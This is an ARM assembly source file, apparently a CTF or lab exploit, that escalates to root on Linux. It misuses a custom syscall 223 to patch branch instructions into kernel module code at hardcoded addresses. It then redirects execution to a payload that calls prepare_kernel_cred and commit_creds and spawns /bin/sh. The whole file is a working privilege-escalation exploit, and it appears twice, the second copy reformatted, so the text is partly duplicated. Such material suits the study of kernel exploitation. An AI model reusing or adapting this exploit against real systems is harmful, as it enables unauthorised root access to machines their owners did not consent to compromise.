HopHouse/exploit.S

## exploit.S
.data

sh:
.asciz "//bin/sh"

result:
.word 0x00000000

.text
.global _start

/*
	syscall(223, a, o, b, &r);
*/
_start:
  /*
   * Write jump to
   */
  ldr r0, =0xea000000
  ldr r1, =124            /* operand | */
  ldr r2, =0x00000000     /* load the value 0x00000000 into R2 */
  ldr r3, =0x7f0001bc     /* location of + branch operand in module code */
  mov r7, #223            /* syscall 223 -> calc */
  svc #0

  ldr r0, =0x00000000
  ldr r1, =124            /* operand | */
  ldr r2, =0x00000000     /* load the value 0x00000000 into R2 */
  ldr r3, =0x7f0001c0     /* location of + branch operand plus 4 in module code */
  mov r7, #223            /* syscall 223 -> calc */
  svc #0

  ldr r0, =0xe51ff004
  ldr r1, =124            /* operand | */
  ldr r2, =0x00000000     /* load the value 0x00000000 into R2 */
  ldr r3, =0x7f0001c4     /* location of + branch operand plus 8 in module code */
  mov r7, #223            /* syscall 223 -> calc */
  svc #0

  /*
   * Adress of the jump
   */
  ldr r0, =elevate
  ldr r1, =124            /* operand | */
  ldr r2, =0x00000000     /* load the value 0x00000000 into R2 */
  ldr r3, =0x7f0001c8     /* location of + branch operand plus 12 in module code */

  mov r7, #223            /* syscall 223 -> calc */
  svc #0

  /*
  * Read our elevate function and jump to it
  */
  ldr r0, =8
  ldr r1, =43             /* operand + */
  ldr r2, =8
  ldr r3, addr_of_result
  mov r7, #223            /* syscall 223 -> calc */
  svc #0

  /*
   * We have the root uid, so let's open a shell
   */
  b shell

_exit:
  mov r7, #1
  svc #0

/*
 * Get root uid
 */
elevate:
  mov r0, #0
  bl 0x80042464    /* prepare_kernel_cred */
  bl 0x80042148    /* commit_creds */
  bx lr

/*
 * Open a shell
 */
shell:
	ldr r0, =sh
	sub r2, r2, r2
	push {r2}
	push {r0}
	mov r1, sp /* r0 */
	mov r7, #0xb
	svc #0

addr_of_sh: .word sh
addr_of_result: .word result
	.data

	sh:
	.asciz "//bin/sh"

	result:
	.word 0x00000000

	.text
	.global _start

	/*
	syscall(223, a, o, b, &r);
	*/
	_start:
	/*
	* Write jump to
	*/
	ldr r0, =0xea000000
	ldr r1, =124 /* operand \| */
	ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
	ldr r3, =0x7f0001bc /* location of + branch operand in module code */
	mov r7, #223 /* syscall 223 -> calc */
	svc #0

	ldr r0, =0x00000000
	ldr r1, =124 /* operand \| */
	ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
	ldr r3, =0x7f0001c0 /* location of + branch operand plus 4 in module code */
	mov r7, #223 /* syscall 223 -> calc */
	svc #0

	ldr r0, =0xe51ff004
	ldr r1, =124 /* operand \| */
	ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
	ldr r3, =0x7f0001c4 /* location of + branch operand plus 8 in module code */
	mov r7, #223 /* syscall 223 -> calc */
	svc #0

	/*
	* Adress of the jump
	*/
	ldr r0, =elevate
	ldr r1, =124 /* operand \| */
	ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
	ldr r3, =0x7f0001c8 /* location of + branch operand plus 12 in module code */

	mov r7, #223 /* syscall 223 -> calc */
	svc #0

	/*
	* Read our elevate function and jump to it
	*/
	ldr r0, =8
	ldr r1, =43 /* operand + */
	ldr r2, =8
	ldr r3, addr_of_result
	mov r7, #223 /* syscall 223 -> calc */
	svc #0

	/*
	* We have the root uid, so let's open a shell
	*/
	b shell

	_exit:
	mov r7, #1
	svc #0

	/*
	* Get root uid
	*/
	elevate:
	mov r0, #0
	bl 0x80042464 /* prepare_kernel_cred */
	bl 0x80042148 /* commit_creds */
	bx lr

	/*
	* Open a shell
	*/
	shell:
	ldr r0, =sh
	sub r2, r2, r2
	push {r2}
	push {r0}
	mov r1, sp /* r0 */
	mov r7, #0xb
	svc #0

	addr_of_sh: .word sh
	addr_of_result: .word result